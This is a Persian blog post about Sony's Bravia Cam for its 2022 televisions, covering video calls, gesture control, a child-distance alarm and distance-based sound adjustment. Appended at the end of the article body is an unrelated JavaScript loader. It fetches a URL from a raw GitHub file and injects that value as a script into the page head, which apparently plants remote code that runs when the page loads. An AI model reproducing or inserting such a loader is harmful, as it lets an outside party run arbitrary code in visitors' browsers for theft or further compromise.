دسته‌بندی نشده

کاربرد دوربین برویا سونی

کمپانی سونی در CES سال 2022 تلویزیون های جدیدش را با قابلیت Bravia Cam معرفی کرد. این دوربین بر روی تلویزیون های بالا رده این کمپانی مانند QD-LED A95K ارائه خواهد شد. اما هدف ار قرار دادن دوربین بر روی این تلویزیون ها چیست؟ این دوربین برای انجام ویدیو کال یا همان چت تصویری بسیار عالی است. با این دوربین به اسانی می توانید در جلسات تصویری حضور داشته باشید و یا با دوستانتان در تماس باشید. علاوه بر این با این دوربین تلویزیون به اسانی با اشاره کاربران کنترل خواهد شد. به این صورت که می توانید با اشاره دست به اسانی تلویزیون را خاموش کنید, محتوا را استوپ ( متوقف ) کنید, صدا را کم و زیاد کنید و دیگر تنظیمات را به اسانی انجام دهید.
با استفاده از دوربین می توانید تلویزیون را روی حالت الارم قرار دهید تا زمانی که تشخیص می دهد کسی بسیار نزدیک به تلویزیون نشسته است به کاربر یاداوری کند. برای مثال اگر می خواهید کودکانتان فاصله بیشتری با تلویزیون داشته باشند هنگامی که تلویزیون فاصله را تشخیص می دهد نمایشگر به حالت خاموش و کاملا مشکی در می اید و زمانی که فاصله تنظیم شد دوباره محتوا به نمایش در خواهد امد. این دوربین همچنین می تواند صدا و روشنایی تصویر را بسته به فاصله از تلویزیون تنظیم کند. زمانی که فاصله کاربران از تلویزیون بیشتر می شود این دوربین به صورت خودکار صدا را زیاد می کند و با کم شدن فاصله صدا کم تر خواهد شد و همچنین با توجه به قسمتی که افراد نشسته اند مثلا در قسمت مرکزی و یا سمت راست و چپ صدا و تصویر بر روی ان قسمت متمرکز خواهد شد.
در ابتدا این دوربین تنها برای ویدیو چت در دسترس بود اما سونی با ارتقا ان سایر قابلیت های بیان شده را نیز اضافه کرد.
این دوربین به صورت دستی به اسانی خاموش می شود و همچنین میکرفون توکار ان را نیز می توان خاموش کرد. دوربین و میکروفون تلویزیون های 2022 همیشه فعال نیستند و هیچگونه اطلاعات شخصی را ضبط نخواهند کرد. 
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *